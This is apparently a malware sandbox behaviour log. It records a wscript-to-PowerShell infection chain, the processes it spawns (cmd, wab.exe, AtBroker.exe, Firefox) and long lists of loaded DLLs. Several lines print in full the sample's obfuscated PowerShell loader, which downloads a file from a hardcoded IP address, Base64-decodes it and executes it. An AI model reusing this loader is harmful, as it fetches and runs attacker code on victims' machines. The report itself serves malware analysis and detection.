(Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hovedafbryderes = 1;$Dives='Substrin';$Dives+='g';Function Rumper($Ninox){$Tomatillo=$Ninox.Length-$Hovedafbryderes;For($Skumle=1; $Skumle -lt $Tomatillo; $Skumle+=(2)){$Tiredly+=$Ninox.$Dives.Invoke($Skumle, $Hovedafbryderes);}$Tiredly;}function Funmaker($Fedtsyrers){. ($inclosers) ($Fedtsyrers);}$Wacky=Rumper 'BM o,z iTlnl a / 5 . 0 ( W i,n d oHw.sI UN,T 1.0P. 0S;S WNi nC6,4,;D Sx 6,4T; r,vL: 1N2I1J. 0.). VG.e.cFkCoS/ 2 0,1S0F0 1I0r1E LF,iIr.e fSo.x /R1.2L1 . 0 ';$Sials=Rumper 'TUBsNe,r -LA.gPe n tU ';$Mucormycosis=Rumper ' hRt t,pt: /./.8O7T..1 2L1...1.0i5C..1 6s3A/,S.t eSr.ePoSt,y,pLeOr iun gIe n,sB7 2 .,x,sEnL ';$lecideiform=Rumper 'G>U ';$inclosers=Rumper ' i e,xS ';$Salrs227='Revanchister';Funmaker (Rumper ',SMeOt -,C.o,nZt eSn tF -.P.aUtPh UTG:B\aDSi,b r oOm,o b e n zPe n eC.Ft,x t - VAaPl uLe $JSPa lUrKs 2 2 7T;s ');Funmaker (Rumper 'pi,f, G(,t eBs.t -RpAaDtSh. TTP:c\RD iUb,r oGmSoFbAe.nPz eSn,eE. tTx,t,) {DeWx i tD}C;, ');$Southrons = Rumper 'Te.cMhOo. ,%Ba,p,p d aKtWaD%I\HA.r g,eSaRnA.OM e nC t&s&D eHc hKo $ ';Funmaker (Rumper 'S$Cg.l.oAb,a l.:.U m oBtLi vSeSr eVd eBs =K(,ctmFdF / c ,$ S oSu tkh.rPoCn,s )U ');Funmaker (Rumper 'F$ gNl.oUbTaKl :GDse,f iTl.e.sV1 2 2S= $UMMuIcSoFrPm,y cSo,s,iUsp.As p.l i tE(,$ l eTcXiLd eGiBfFo.r mT)M ');$Mucormycosis=$Defiles122[0];Funmaker (Rumper ' $.gFl oDbSaSl : GGrRa,a,l i g sPt eE=GN.efwk-.O,b.j eCcJtW HSSy sNt e.mE.XN e,tG.DW,enbNC l,iLe.nOtF ');Funmaker (Rumper 'S$tGDrSa aRl.i.gEs.tfe...H e aAdSe.r s [ $CS.i aSlBsS]A= $HWSaLcckSy ');$Folkekongressen=Rumper 'uGpr aAaAl.i gTsHtde..aD,oSw,n l oRa.dKF,i lMeS(H$.MBuUc,oFrKmPyEcroPs,i sR,C$Sa fGm,n.sUtMrKeUnRd.ems ) ';$Folkekongressen=$Umotiveredes[1]+$Folkekongressen;$afmnstrendes=$Umotiveredes[0];Funmaker (Rumper ' $ g,l ofbHaWl :.f rSi.t nLkSeRr i =K(MTNe s tQ-KP,aSt,h T$FaTfGm nGs.tGrzeMn dSeMs )P ');while (!$fritnkeri) {Funmaker (Rumper ' $Dg.l o bEa,lP:SP.aRr kJe,rHiHn gJsFsGkUiTv e.n,=C$ t r,uRe, ') ;Funmaker $Folkekongressen;Funmaker (Rumper 'TSNtKaLrst -GSSl eFeNpG S4A ');Funmaker (Rumper 'R$SgAlBoPb.aClE:Cf.rkiTt nTk eOr iR=E(NT,eUsFtF-,P ast.hA $.aCf mPnCs t rCe nGdIe,sE)H ') ;Funmaker (Rumper ' $Ug.lMoSbHa lS: B,oDl dDgBa dSe n = $,g l.oHbFaDlU:UB,rPu,nZk uBl s,l eBj eRtB+H+K% $DDOelf,i l e.s 1P2S2 .Rc o,u nMt ') ;$Mucormycosis=$Defiles122[$Boldgaden];}Funmaker (Rumper ' $.gOlPoDb.aNl :UFVrSe,mLaDdUsWt r b e n d e,sR =B KG e tN- C.oPnZt enn.tS .$Oa,f mTnZs,t,r.eEnAdIe sS ');Funmaker (Rumper 'D$SgCl.oGbMaAlS:APShHi l o,nCi cS K=A [SS yTsTtMe.mE. CIo n.vSe,r,t,] :B: FFrSo,m B aSs.e 6,4BS tDrOiHnAg (,$SF rAeUm aFdMs t r,bAe n dKeksR)M ');Funmaker (Rumper 'E$TgJlPo bAaBl.:TBAs,sCeTlIb,e t s, .=K [ S,y.sCt e,m . T ePxIt . E n cIoDdSi,nAgO] :P:MA S C,IDIS.VG.e tHS.tRr i nMgF(c$MP hTi l,o n.i,cE) ');Funmaker (Rumper 'M$Eg,lSoPb aal :CLKaBr.y.npgRoOtRoGmFeF=R$,B,s sPeAlPbSe tRsD.Ds uQbMsTt r.iSnMgS(S2.7Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Argean.Men && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeProcess created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\ejTYeDcBNvUlylNsyvzxEosVlgcdZZlVBBnEZZgWWxLbMTDUaVwwWn\lgoTSqyYpvNuVXUkRnDp.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\AtBroker.exeSection loaded: winsqlite3.dllJump to behavior
